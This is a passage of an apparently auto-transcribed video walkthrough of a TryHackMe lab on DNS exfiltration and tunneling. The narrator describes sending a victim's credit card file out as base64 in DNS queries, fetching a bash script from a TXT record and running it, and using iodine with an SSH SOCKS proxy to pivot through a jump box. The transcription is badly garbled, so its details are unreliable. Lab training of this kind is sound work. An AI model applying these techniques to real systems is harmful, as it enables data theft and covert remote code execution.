for it, and we have to be adding fold-w for 18 for exfiltration for it. So we have to be using set single quotation mark, just add to this dot. Alright, let me go over here and reconnect for it, and say the multiply for giving old value and all of things here, and just add this na and dot here. So now I think we have to be go one more time to tr to -d and giving here the same width as what we were doing before, the backslash and for the same column. And now we have to be adding set one more time, right? Alright, let me check it. Yeah, but before do this we have to be adding like this or tunnel.com is using for it. I'm just gonna be using enter for it as command now one unterminated as command. Where's as command? Cat task form credit task tr-d and fold-n set as command is not fun. Alright, let me just one more time to enter for it, but on terminate as command. Where is as command here? Is error for on it, but this is not wrong. This is no, this is not wrong. Yeah. No, this is not wrong. Alright, let me do it. Let me say paste one more time. Now it's gonna be working now? Wow! What? Alright, let me go attacker here. Now it's giving us a shell. Oh my god, that's really cool. Now we are getting here to... Yes! We are getting here to what we were doing before the for value. So what we're doing here now, I'm just gonna say once our DNS request receive it, we can stop the TCP dump tool, receive it data by removing the unwanted strings. Okay, I'm just gonna say Control C for it. So alright, let me see last. So let me say echo for we got before things here. Let me copy all of things to on my. Okay, like that. We have to be using like that. Let me say echo and give quotation mark for it to resolve it out all of things here. Just let me say cut what we're cutting here, cut dash D for dot here. We have to be cut the dot here and then dash v 1 dash 8 for because we are adding here to the 8 value to giving it. So I'm just gonna use what we're doing before, tr-d for just dot value is over here and the 4. Now it's time to hear decoding. So I'm just gonna use basics for decoding. So okay guys, we are getting the credit card number. Alright, credit card number information is over here. Now we are getting to the with using them for DNS, and this DNS is victim 2's credit card informations basically. So it will be cool, fine to me. I love this. Now it's asking us to now is communication over DNS and how can we are using it actually doing here. So it's giving us the same value of like that. So we have to be adding here in the tunnel.com and the add here to basics for what we're doing before. It's giving us the basics here, but we are actually generally using this because I love it. We are actually using it to basics to for TR and SAP file. I love these tools and I'm just generally using this. So executed the CT communication over DNS protocol and go for flag tunnel.com here. So we can check it this like that, go for the txt file, the domain name for it. So I think we have to be go victim 2 right here. I'm just gonna say let me decode it to on my server chef. I'm just gonna use like that. So it's giving us bin bash ping-c.com like that. So I think we have to be using here to on my victim 2, go for tmp like that, tmp, and just say here echo. No, I'm just gonna use nano and say script dot shell here. I'm just gonna say enter and go back. Now it's cat tmp the script.shell with using base 64. Now it's giving us the same values over here. So now that we have to be basics for representation scripts as txt DNS record the domain we control, which is case-tunnel.com. And the tunnel.com you have to be adding web interface we provide like this. We have to be going at the HTTP go for on this IP address. Alright, let me go this. Opening a new tab to giving us DNS changer. So we have to be adding here dig.show or script-tunnel.com and giving some script-tunnel.com is giving this bash what we were doing before. So let me go victim 2 and say here dig dig.short for -t just for txt file and say here script.tunnel.com. So it's giving us this for how come we are using it. So what we are doing before script.shell here. So we have to be adding here to tr one more time -t, but we have to be actually just backslash and quotation mark for it. So we are getting the basics for encoding. Now it's time to go for decoding it and run with bash. So it's giving us to one packet, is giving result is like that. Now I think we have to go for DNS protocol flag tunnel.com. What is the flag? You can read the flag right that. Okay, so I think we have to go task 10 for getting here. Task 10. Okay, DNS tunneling. This task will show how to create tunnel-proof DNS protocol. Ensure that understand concept discusses previous task. Exfiltration over DNS tunneling tools work in the same techniques. DNS tunneling TCP over DNS. So what we are doing here, it's actually giving us the video. How come we are doing it? Alright, we have to go attacker one more time. The first one, the first things we have to go attacker, and then giving the password at the tunnel.com. Okay. Oh, that's right. Alright, let me go ahead. So this section will go through the steps required to establish communication channel of over DNS. We will apply the techniques or network infrastructure to provide jump box and victim to pivot from networks. For more information about the network's infrastructure, please check task 2. We will be using this iodine tool for creating DNS tunneling communication. Now that we have already installed it on the jump box attacker machines, to establish DNS tunneling we need to follow following steps. The first one, ensure the update of DNS record and create DNS points attack box machine. Check task 8, or you can use pre-configured name server which points attacker machine. So or run IONDN server attack box and attacker machine over server side was iodinate. So we have to be using iodinate like that. So let me, for example, copy this and go for my attacker shell and just run it. So I'm just gonna giving for password TryHackMe. No, it's really wrong. Okay, TryHackMe. Now we are on listening on DNS for domain at tunnel.com, so it could be fine. So that means we have to be using ifconfig. Alright, let me, okay, I'm here guy. http web.tryhackme.com demo.php sudo ind-php tryhackme pass to for using this scat or att connect. Okay, we got it before, so I think we have to come over here and then sudo going here like that. We're on the listening tunnel. So what we're doing next, just go for on the attack box to own this IP. What we are giving it is we have to be going jump box. All jump box is already there. Now already there. I'm just gonna be exit here. Now we are on the jump box. Okay, and now here sudo iodine. Alright, I'm just gonna use sudo iodine for, let me say, the for password TryHackMe pass and at tunnel.com. Yep, like that. Just give the for detaching from terminal. It's giving us a common attacker. It's giving us nothing now. Alright, that's cool. It doesn't matter. So we have to be going now to SSH to TryHackMe zone. There's the different IP addressing using here. Now we have to be writable here ifconfig DNS 0, right? So let me say it here. Alright, to on my jump box we have to be using pings. Alright, we have to be looking for ifconfig for DNS 0 server. I'm just gonna use DNS 0. It's giving us this IP address. Let me if I have a getting the connection for it for using ping -c2, or let me copy this. Yes, we have this error. Now we have gathered the connection for it. I think we have to be go root attacker.com is over here. We have to be using for SSH on the TryHackMe and go for this IP address running for it. But we have to be adding here 4 and -f -n and -d 1080 here. So it's giving us the now we have to be waiting for it, but proxy chain curl the demo.php here. Well, how can be running for this? I'm just gonna be watching here. Okay, SSH this port is giving us attacker. Alright, ifconfig DNS 0, we got it before, so time to running. Yeah, it's giving us this connection for it, so there's nothing already here. I'm just gonna net stat then dash grab. Okay, curl demo.php. Alright, alright, let me do it on my attacker box. I'm just gonna say netstat -nt for go to grab to on my 1080 here, and I say here curl http for web.tryhackme.com. Right, yes, and go for demo.php here. So it's gonna be Ctrl+C one more time. Go for it. SSH TryHackMe 1.0 and HTTP. I'm just gonna say yes, but it's giving us no result here. Apply the DNS tunneling technique, provide network environment access to this file, test.php. Okay, I think we have to be waiting for it to curl this, and the attacking for connection, we have to be looking for how many interface error for like the on this IP address. So what we're doing here before, what is network interface name is iodnet here, and go for test.php domain name here. So what we're doing, what is not gonna be working, I'm just gonna be watching for it. Nasdaq-nt lpda curl http for going web tryhackme.com here, demo.php -c socks for 5. Oh, it's giving us the flag here. Okay, I got it. I'm just gonna try for it. For example, we have to be curl on it, the demo.php, and say here, no, let me go like that. I'm giving here socks 5 on this IP address, but we already, why are giving this? I'm just gonna say netstat here for looking for netstat socket. It's giving us TCP connection for it. It's just giving us the 22 here. There is no 10.80 here. Right, there's no flagger like that. Alright. Curl for the demo.php here and just go for dash dash socks 5 on the normally IP address like that. We have to be adding here to it. And go for alright. I'm just gonna be paste it, so it's giving us nothing right here. Unable to receive initial socks 5 here. So what is actually this doing here? Alright guys, let me try this, but it's giving us nothing. I have no idea what we're doing here. .id here. The connection refused because there is no per like that. Alright, let me using for sudo tsmp -i the udp port here. Alright, when identity connection establishes, attacker run if config command how many interfaces are. Okay, I'm just gonna use ifconfig here for iodine running on it. So let me go up. Oh, we have to be adding here, that's right. We have to be adding a proxy change curl. What? Ah, we got it before. Yeah, we have to be adding here curl on demo.php. Alright, let me paste that. Failed to connect, poor connection is refused for us. So let me try for on it to go for test.php, right? Yes, we have to be adding here test.php. Not on this port. I'm gonna use netstat dash for anti-LDP is giving us this port. Let me using this, or it's gonna be not working, but let's try. Unable to receive until socks 5, but there is no AD here. That means that we cannot run in here. So let me go task 11 for conclusion, but we have to be doing it. What we are doing, go. Apply DNS technique and provide an access to that PHP. When you done a connection, stop attacker run if config command how many interfaces are. So what we're doing before iodine. Okay. Alright, let me doing all of things again. Let me copy this on my attacker box. I'm just gonna be using here clear, and what we're doing it before, I'm just gonna using it this gain. So what we're doing here, just actually SSH and then go for ifconfig here, and then curl 4 on it. You just have to be curl 4 on it. I'm just gonna use a curl for http dot for what? I'm just gonna using for http on this port to test.php. I'm just gonna say copy this and then curl, let me give it, and add here test.php. Now it's giving us, we have to be adding here to, yep, like that, demo.php. Okay, close this block. And just Control C and say here sudo init io dinet for -p TryHackMe password 10.1.1.1 for looking for also cats here at tunnel.com. All right. All right, cool. So I think we have to be good jump box here, that's right. So let me say ifconfig. So let me go for first question. When are you doing connection established attacker run ifconfig, how many interfaces are there? Execute ifconfig from jump box when IODNA connection establishes. There's then 4 interfaces are there. What is network interfaces mainly created by IODNA? There is IODNA is creating 5. Where there's no game 4. What's the 5? Okay. What is this for one? Let me say ifconfig here now. No, there's no DNS0 here. Where is DNS0? It could be as giving us DNS0 here. But if I'm gonna say ifconfig for DNS0, the device is not found. What we're doing here is running for on this jump box. Yep, I think yes. Let me copy this and come over here, just paste it. Now time to ifconfig. No, yes, no, we are getting DNS0 here. Alright, that's cool. Okay, guys. Now we are on here the DNS0, so I think it's time to running for on it. Let me go there for my attacker. I'm just gonna say passed. Let me enter. Yes. The password. What's password? Let me TryHackMe. Alright, we got it. So now we have to be using scroll6.5 is like that. I'm just gonna use, for example, on it. I'm just gonna say paste is giving us nothing, I think. So if you can check it, the first one is the DNS0 is creating and the 4 interfaces is over there. So we are getting here. Let me watch this one more time. Alright. Is there an ifconfig here? Alright, ifconfig. Yep, DNS0 is over there, and this is a DNS0 iNet. So netstat -anti-lpd here. Now, yes, we are getting here the first one. Okay, I'm just gonna use SSH dot now TryHackMe at 10.1.1.0. No, it's giving us the 1. Why are you giving the 0? No, 2-n -if -d 10.80 here, the password. Let me TryHackMe. Okay. No. TryHackMe. Now it's giving us the culinary request local forwarding. Alright. What are you giving here? That's really cool. Just let me say curl http to 4 on this. Let me copy, add here, pass clipboard. Now it's time to forwarding it. Okay, what's next? Giving here to -/5 on this, right? Alright, I'm just gonna say connection failed. Okay, let me http on this IP address, go for test.php. It's doing nothing. Alright, let me say --sucks5 on it. No, sucks5, and give this. It could be giving us this flag here. Oh my god. Why is not giving flag here? We have to be doing it on jump box. I think it's not. Oh, let me try. Well, it's not giving us the flag here. I know. Oh, no connection refused here, but we are waiting for it. No, we have to be waiting for it. Is getting here the flag. Oh shit. No, why is not giving flag? It could be it's giving flag here. Alright, just let me say netstat -nt for working on grep 10.18. Yes, it's running on. So I think it could be have to giving the flag here. This flag is equal to this. So ensure the pivot through jump box to get flag. We have to be doing it of the jump box -nt for giving here the grep 1080. But it's not gonna be working on the server to test.php. Let me try. I'll go for the test.php here. Now it's gonna fail to connect this. Alright, we have to be doing all of things what we were doing before on the jump box, and it's giving us this TryHackMe flag. So we are getting this, all of the flags is over here. No, it is not giving flag, I know, because it's connection then finish it here. it could be on the over than 1 hour video, guys. And I like this data exfiltration here, so let me like it. And this is of the ending the video. Now we have to be going here to for red teamings, network security evasion. The first of all, network security solution, we got it. And now firewalls and sandbox evasion. Don't watch this video, don't remember to watch this video, guys. Alright, this is the end of the video.